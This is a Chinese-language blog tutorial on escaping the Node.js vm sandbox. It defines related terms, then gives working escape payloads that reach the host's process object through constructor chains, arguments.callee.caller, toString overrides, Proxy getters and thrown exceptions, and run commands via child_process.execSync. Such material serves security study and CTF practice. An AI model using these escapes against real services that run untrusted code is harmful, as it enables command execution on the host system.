Nodejs沙箱逃逸

目录

一、名词解释:

1、NPM

2、Node.js

3、VM

4、VM2

5、Sandbox(又叫沙箱、沙盘)

6、arguments.callee:

7、arguments.caller:

二、沙箱逃逸

1、核心原理

2、基础隔离环境

原型

变式

最终变式

3、进阶隔离环境(上下文中不存在this也不存在其他对象 )

情况一:沙箱外如果执行了比如连接字符串等操作

情况二:如果沙箱外没有执行字符串相关操作

情况三:如果沙箱的返回值没有做任何事,或者没有捕捉返回值


一、名词解释:

1、NPM

全称是Node Package Manager,是一个NodeJS包管理和分发工具,已经成为了非官方的发布Node模块(包)的标准。NPM由三部分组成:网站,注册表(registry),命令行工具(CLI)。

2、Node.js

一个基于Chrome V8引擎的JavaScript运行环境,使用了一个事件驱动、非阻塞式I/O模型,让JavaScript 运行在服务端的开发平台,它让JavaScript成为与PHPPythonPerlRuby等服务端语言平起平坐的脚本语言

(简单来说, Node.js 就是运行在服务端的JavaScript,npm是随同Node.js一起安装的包管理工具,通过命令从npm服务器下载别人编写的第三方工具到本地使用。)

3、VM

Node.js官方标准库中有一个vm库,用来在V8虚拟机环境中编译执行JS代码,。通常,用vm库来实现一个沙箱,在代码主程序之外执行额外的JS脚本。有时,需要vm虚拟机来执行不受信任的代码。

4、VM2

VM2的诞生解决了VM的安全问题基于。vm,使用官方的vm库构建沙箱环境。然后使用JavaScript的Proxy技术来防止沙箱脚本逃逸。

vm2特性:

  • 运行不受信任的JS脚本
  • 沙箱的终端输出信息完全可控
  • 沙箱内可以受限地加载modules
  • 可以安全地向沙箱间传递callback
  • 死循环攻击免疫 while (true) {

5、Sandbox(又叫沙箱、沙盘)

即是一个虚拟系统程序,允许你在沙盘环境中运行浏览器或其他程序,因此运行所产生的变化可以随后删除。它创造了一个类似沙盒的独立作业环境,在其内部运行的程序并不能对硬盘产生永久性的影响。 在网络安全中,沙箱指在隔离环境中,用以测试不受信任的文件或应用程序等行为的工具。

沙箱通常用于执行不受信任的程序或代码,例如用户输入、第三方模块等等。其目的为了减少或者避免软件漏洞对计算机造成破坏的风险。

6、arguments.callee:

是一个指向当前正在执行的函数本身的引用。通过 arguments.callee 可以在函数内部递归调用自身,而不需要知道函数的名称。在过去,它经常用于创建匿名递归函数。

例如:

const factorial = function(n) {
  if (n === 0 || n === 1) {
    return 1;
  } else {
    return n * arguments.callee(n - 1); // 不推荐使用
  }
};
但是,由于 arguments.callee 在严格模式下会导致错误,建议使用命名函数表达式或函数声明来实现递归。

7、arguments.caller:

是一个指向调用当前函数的函数的引用。它提供了一种查找调用栈的方式,可以追溯到调用当前函数的函数。与 arguments.callee 类似,arguments.caller 也在严格模式下被弃用。
例:

function outer() {
  inner();
}
function inner() {
  console.log(arguments.caller); // 不推荐使用
}
outer();
在上述例子中,inner 函数内部使用 arguments.caller 来获取调用它的函数 outer 的引用。
但是请注意,这两个属性已经被弃用,应该避免在代码中使用它们。相反,可以使用函数表达式、
命名函数或箭头函数来实现递归,而不需要依赖 arguments.callee。要获取调用栈的信息,可
以使用 Error 对象的 stack 属性。

arguments.callee.caller是指获得调用这个函数的调用者

二、沙箱逃逸

1、核心原理

只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。

2、基础隔离环境

原型

const vm = require('vm');
const script = `m + n`;
const sandbox = { m: 1, n: 2 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

this 指向传给vm.createContext的那个对象

m 等于数字1

n 等于数字2

变式

我们可以使用外部传入的对象,比如this来引入当前上下文里没有的模块,进而绕过这个隔离环境。比如:

const inspect = require('util').inspect;
const vm = require('vm');
const script = new vm.Script(
(e => {
	const process = this.toString.constructor('return process')()
	return process.mainModule.require('child_process').execSync('whoami').toString()
})()
);
const sandbox = {m: 1, n: 2};
const context = new vm.createContext(sandbox);
const res = script.runInContext(context);
console.log(res)

 其中:

const process = this.toString.constructor('return process')() 
第一行this.toString获取到一个函数对象,this.toString.constructor获取到函数对象
的构造器,构造器中可以传入字符串类型的代码。然后在执行,即可获得process对象。

process.mainModule.require('child_process').execSync('whoami').toString()
第二行,利用前面获取的process对象既可以干任何事。

问题一:为什么我们不直接使用{}.toString.constructor('return process')(),却要使用this呢?

这两个的一个重要区别就是,{}是在沙盒内的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的对象即使使用这个方法,也获取不到process,因为它本身就没有process。

问题二:m和n也是沙盒外的对象,为什么也不能用m.toString.constructor('return process')()呢?

因为primitive types,数字、字符串、布尔等这些都是primitive types,他们的传递其实传递的是值而不是引用,所以在沙盒内虽然你也是使用的m,但是这个m和外部那个m已经不是一个m了,所以也是无法利用的

综上所述:如果修改下context:{m: [], n: {}, x: /regexp/},这样m、n、x就都可以利用了。

最终变式

const inspect = require('util').inspect;
const vm = require('vm');
const script = new vm.Script(
(e => {
	const process = x.toString.constructor('return process')()
	return process.mainModule.require('child_process').execSync('whoami').toString()
})()
);
const sandbox = {m:[], n: {}, x: /regexp/};
const context = new vm.createContext(sandbox);
const res = script.runInContext(context);
console.log(res)

3、进阶隔离环境(上下文中不存在this也不存在其他对象 )

我们改一下代码,让上下文中不存在this也不存在其他对象,代码如下:

const vm = require('vm'); 

const script = `...`; 

const sandbox = Object.create(null); 

const context = new vm.createContext(sandbox); 

const res = vm.runInContext(script, context); 

console.log('Hello ' + res) 

在 JavaScript 中,this 关键字的值取决于函数的执行上下文。在全局作用域中,this 通常指向全局对象(如浏览器环境中的 window 对象,Node.js 环境中的 global 对象)。但是,在使用 Object.create(null) 创建的对象上下文中,this 将为 null。

const sandbox = Object.create(null);
Object.create(null) 是一个创建一个新对象的方法,该对象没有继承自任何原型链。在 JavaScript 中,Object.create(null) 会创建一个纯净的对象,它没有继承自 Object.prototype 或任何其他原型对象,因此不会拥有默认的原型方法和属性。这样的对象通常被称为“空对象”或“纯净对象”。

在这个纯净对象 sandbox 上下文中,由于没有原型链,它的 this 值将为 null。也就是说,如果在 sandbox 对象的上下文中使用 this 关键字,它将是 null。

例1

const sandbox = Object.create(null);

function greet() {
  console.log(this);
}

greet(); // Output: null

在上述示例中,我们定义了一个名为 greet 的函数,并在全局作用域中调用它。由于函数在全局作用域中调用,它的 this 值将为全局对象(如浏览器环境中的 window 或 Node.js 环境中的 global)。然而,如果我们在 sandbox 对象的上下文中调用 greet 函数,this 将为 null。

例2

const sandbox = Object.create(null);

function greet() {
  console.log(this);
}

sandbox.greet = greet;
sandbox.greet(); // Output: null

在这个例子中,我们将 greet 函数作为 sandbox 对象的方法,并在 sandbox 对象的上下文中调用它。在这种情况下,this 将是 null。

我们可以借助arguments对象。arguments是在函数执行的时候存在的一个变量,我们可以通过arguments.callee.caller(详细见名词解释)获得调用这个函数的调用者。 我们在沙盒中定义一个函数并返回,在沙盒外这个函数被调用,那么此时的arguments.callee.caller就是沙盒外的这个调用者,我们再通过这个调用者拿到它的constructor等属性,就可以绕过沙箱了

情况一:沙箱外如果执行了比如连接字符串等操作

(() => {  

const a = {}  

a.toString = function () {    

const cc = arguments.callee.caller;    

const p = (cc.constructor.constructor('return process'))();   

 return p.mainModule.require('child_process').execSync('whoami').toString()  

}  

return a })()

toString就是定义的恶意函数,里面拿到了caller,再通过caller的constructor来获取process,最后执行命令。沙箱外如果执行了比如连接字符串等操作,就会执行这个toString函数,进而触发命令执行。

情况二:如果沙箱外没有执行字符串相关操作

我们可以使用Proxy来劫持所有属性,只要沙箱外获取了属性,我们仍然可以用来执行恶意代码:

(() => {  

const a = new Proxy({}, { 

get: function() {      

const cc = arguments.callee.caller;      

const p = (cc.constructor.constructor('return process'))();     

 return p.mainModule.require('child_process').execSync('whoami').toString()

}  

})    

return a })()

情况三:如果沙箱的返回值没有做任何事,或者没有捕捉返回值

我们可以借助异常,把我们沙箱内的对象抛出去,如果外部有捕捉异常的(如日志)逻辑,则也可能触发漏洞:

vm = require('vm'); 

const code5 = `throw new Proxy({}, {    `

 `get: function() {     `

 ` const cc = arguments.callee.caller;     ` 

 ` const p = (cc.constructor.constructor('return process'))();      ` 

 `return p.mainModule.require('child_process').execSync('whoami').toString()    `

 `}  `

 `}) `; 

try {    vm.runInContext(code5, vm.createContext(Object.create(null))); }

 catch(e)

 {    console.log('error happend: ' + e); }

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值